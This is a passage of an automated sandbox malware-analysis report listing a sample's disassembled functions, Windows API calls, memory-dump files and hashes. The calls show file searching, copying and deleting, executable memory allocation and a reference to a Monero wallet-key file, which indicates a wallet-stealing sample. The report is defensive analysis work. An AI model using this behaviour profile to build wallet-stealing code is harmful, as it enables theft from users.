lstrlen.KERNEL32(00000000), ref: 0081B17E

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: fb52ac5f66d28960dd2bbead4d73ac036ecf09c9a2a680bed08d9b3cb1385f6c
Instruction ID: 21b095cf7afb8765469bf83c59e58f8fe3829da988869287c1343402f6d8cd40
Opcode Fuzzy Hash: fb52ac5f66d28960dd2bbead4d73ac036ecf09c9a2a680bed08d9b3cb1385f6c
Instruction Fuzzy Hash: BC91E2729101289BDB08EBA4EC96DEE7378FF54300F404569F517E6191EF346A89CBA3

Function 0081B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

lstrlen.KERNEL32(00000000), ref: 0081B42E
lstrlen.KERNEL32(00000000), ref: 0081B442

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: d9c1f8dddadabfbce93c21a20e9140b4c2cd42bd33957a5db1e94c3f6ec93cbb
Instruction ID: 1c8cce74ab9bfc27ecbca7af525ea78c8723f2ffebc502b69cece1dab3000f75
Opcode Fuzzy Hash: d9c1f8dddadabfbce93c21a20e9140b4c2cd42bd33957a5db1e94c3f6ec93cbb
Instruction Fuzzy Hash: 4371FF719101289BDB08EBA8ED96DEE7378FF54300F404529F516E6191EF346A89CBA3

Function 00824BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00828DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828E0B

lstrcat.KERNEL32(?,00000000), ref: 00824BEA
lstrcat.KERNEL32(?,00EFD358), ref: 00824C08

Part of subcall function 00824910: wsprintfA.USER32 ref: 0082492C
Part of subcall function 00824910: FindFirstFileA.KERNEL32(?,?), ref: 00824943

Part of subcall function 00824910: StrCmpCA.SHLWAPI(?,00830FDC), ref: 00824971
Part of subcall function 00824910: StrCmpCA.SHLWAPI(?,00830FE0), ref: 00824987
Part of subcall function 00824910: FindNextFileA.KERNEL32(000000FF,?), ref: 00824B7D
Part of subcall function 00824910: FindClose.KERNEL32(000000FF), ref: 00824B92

Part of subcall function 00824910: wsprintfA.USER32 ref: 008249B0
Part of subcall function 00824910: StrCmpCA.SHLWAPI(?,008308D2), ref: 008249C5
Part of subcall function 00824910: wsprintfA.USER32 ref: 008249E2
Part of subcall function 00824910: PathMatchSpecA.SHLWAPI(?,?), ref: 00824A1E
Part of subcall function 00824910: lstrcat.KERNEL32(?,00EFE260), ref: 00824A4A
Part of subcall function 00824910: lstrcat.KERNEL32(?,00830FF8), ref: 00824A5C
Part of subcall function 00824910: lstrcat.KERNEL32(?,?), ref: 00824A70
Part of subcall function 00824910: lstrcat.KERNEL32(?,00830FFC), ref: 00824A82
Part of subcall function 00824910: lstrcat.KERNEL32(?,?), ref: 00824A96
Part of subcall function 00824910: CopyFileA.KERNEL32(?,?,00000001), ref: 00824AAC
Part of subcall function 00824910: DeleteFileA.KERNEL32(?), ref: 00824B31

Part of subcall function 00824910: wsprintfA.USER32 ref: 00824A07

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 961e8dbf0409082a4bdadcace9b0ef83c218a531e98da133899ca423c1319e5b
Instruction ID: dd8566fa16b18404980a4f24e2d1fb30cd4074232c7a16321b8c97973a763603
Opcode Fuzzy Hash: 961e8dbf0409082a4bdadcace9b0ef83c218a531e98da133899ca423c1319e5b
Instruction Fuzzy Hash: 1E41B8B760020867CB54F7A4FC42DEE373DFB94300F004648B65A96285ED755BC98BA3

Function 00816660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00816706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00816753

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fcfbd8853bb4b886ce71a25912c3868bb71f40467f9eb60f707ac19196275bdb
Instruction ID: ea872403f85727b8ed37c43c841194f2a6227b639124b13f0cf00629535fd8be
Opcode Fuzzy Hash: fcfbd8853bb4b886ce71a25912c3868bb71f40467f9eb60f707ac19196275bdb
Instruction Fuzzy Hash: DF41E974A00208EFCB44CF98C494BEDBBB5FF54314F248699E9499B345D731AAD1CB84

Function 00825050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00828DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828E0B

lstrcat.KERNEL32(?,00000000), ref: 0082508A
lstrcat.KERNEL32(?,00EFD878), ref: 008250A8

Part of subcall function 00824910: wsprintfA.USER32 ref: 0082492C
Part of subcall function 00824910: FindFirstFileA.KERNEL32(?,?), ref: 00824943

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 1dffa97d4e15c5fbdbd02b21e8fc9c1e679c4944f1c5f3f2824d282fbc6dd9a5
Instruction ID: 33bf4cb85a334093f340cc3510a498b120b92e9efe3a92213627af942458f883
Opcode Fuzzy Hash: 1dffa97d4e15c5fbdbd02b21e8fc9c1e679c4944f1c5f3f2824d282fbc6dd9a5
Instruction Fuzzy Hash: CE01C876A00218A7CB54FBB4EC47DEE373CFB64301F004244B64AD2191EE709AC98BA3

Function 008110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008110B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008110F7

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 6e910e271aeee48479532cbc0a7af14c3b04a7d572b2ae7216e23e5d1c191d99
Instruction ID: b91b0aed8b05a9d29cd5ddc046676b7df92c0bbf57ab81e9fe9c02e446937ec7
Opcode Fuzzy Hash: 6e910e271aeee48479532cbc0a7af14c3b04a7d572b2ae7216e23e5d1c191d99
Instruction Fuzzy Hash: 54F0E971A41314BBEB14D6A4AC49FAEB7DCF709715F300544F604E3280D5715E40CA51

Function 00828D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00811B54,?,?,0083564C,?,?,00830E1F), ref: 00828D9F

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: da7f779a02e940c838355640f64ea7d66a81295b6cff1dea94fc71157499ae23
Instruction ID: 23750bbfad617a2bbf1d3d09097f4a4b7d87c77eb1213823978d484cf8bf9ee3
Opcode Fuzzy Hash: da7f779a02e940c838355640f64ea7d66a81295b6cff1dea94fc71157499ae23
Instruction Fuzzy Hash: 31F01570C0121CEBCF04EFA8E5496DCBB74FF10310F108299E826A72C0DB345A8ADB82

Function 00828DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828E0B

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
